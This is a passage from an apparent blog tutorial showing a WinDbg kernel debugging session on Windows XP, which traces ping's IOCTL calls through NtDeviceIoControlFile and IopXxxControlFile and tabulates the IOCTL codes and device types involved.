New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f5a4 00120090 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00169078 00000030</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6cc 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f64c 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000f79b8 00000120</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000de808 0000016c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 178 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000218 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f71c 0021009a 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00c9f6b8 0000003c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Breakpoint 4 hit</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ping!main+0x9ad:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 001b:01002376 e883070000 call ping!IcmpSendEcho2 (01002afe)</span></span></blockquote><ul><ul><li> The summary of <b>IoControlCode</b> sent to kernel: </li>
</ul></ul><ul><ul><table align="center" border="1"><tbody>
<tr><td align="center"><b>IOCTL_CODE</b></td><td align="center"><b>FILE_DEVICE_TYPE</b></td></tr>
<tr><td>120000</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>120003</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>120040</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>120090</td><td>FILE_DEVICE_NETWORK</td></tr>
<tr><td>21009a</td><td>FILE_DEVICE_TRANSPORT</td></tr>
<tr><td>17003e</td><td>FILE_DEVICE_PHYSICAL_NETCARD</td></tr>
</tbody></table></ul></ul><ul><ul><li>We want to check the flow when packets passed to the NIC driver, we focus on <b>FILE_DEVICE_PHYSICAL_NETCARD. </b>Before that check out this disassembly first:</li>
</ul></ul><blockquote><blockquote><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> u nt!NtDeviceIoControlFile l20</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d592 55 push ebp</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d593 8bec mov ebp,esp</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d595 6a01 push 1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d597 ff752c push dword ptr [ebp+2Ch]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d59a ff7528 push dword ptr [ebp+28h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d59d ff7524 push dword ptr [ebp+24h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a0 ff7520 push dword ptr [ebp+20h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a3 ff751c push dword ptr [ebp+1Ch]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a6 ff7518 push dword ptr [ebp+18h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5a9 ff7514 push dword ptr [ebp+14h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5ac ff7510 push dword ptr [ebp+10h]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5af ff750c push dword ptr [ebp+0Ch]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5b2 ff7508 push dword ptr [ebp+8]</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5b5 e854e8ffff call nt!IopXxxControlFile (81a62764)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5ba 5d pop ebp</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5bb c22800 ret 28h</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">8056d5be 90 nop</span></span> </blockquote></blockquote></div><blockquote><blockquote><span style="font-size: x-small;"><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> bp 8056d5b5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> g</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">Breakpoint 2 hit</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!NtDeviceIoControlFile+0x25:</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">8056d5b5 e8bc700000 call nt!IopXxxControlFile (80574676)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> wt</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 1] nt!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 48 19 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 0 [ 1] nt!ObReferenceObjectByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 2] nt!ExMapHandleToPointerEx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 29 0 [ 3] nt!ExpLookupHandleTableEntry</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 36 29 [ 2] nt!ExMapHandleToPointerEx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 67 65 [ 1] nt!ObReferenceObjectByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 22 0 [ 2] nt!ExUnlockHandleTableEntry</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 83 87 [ 1] nt!ObReferenceObjectByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 72 189 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 1] nt!ObfReferenceObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 82 203 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 0 [ 1] nt!IoGetRelatedDeviceObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 97 226 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 1] nt!IoAllocateIrp</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 2] nt!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 38 19 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 207 33 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 2] nt!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 208 42 [ 1] nt!IopAllocateIrpPrivate</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 158 481 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 25 0 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 0 [ 2] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 3] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 3] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 3] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 73 14 [ 2] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 46 87 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 63 0 [ 2] nt!PsChargeProcessPoolQuota</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 51 150 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 2] nt!ObfReferenceObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 59 164 [ 1] nt!ExAllocatePoolWithQuotaTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 194 704 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 27 0 [ 1] nt!IoAllocateMdl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 2] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 55 14 [ 1] nt!IoAllocateMdl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 206 773 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 7 0 [ 1] nt!IopGetMountFlag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 3] nt!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 123 19 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 3] hal!KeRaiseIrqlToDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 199 24 [ 2] nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 3] nt!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 200 33 [ 2] 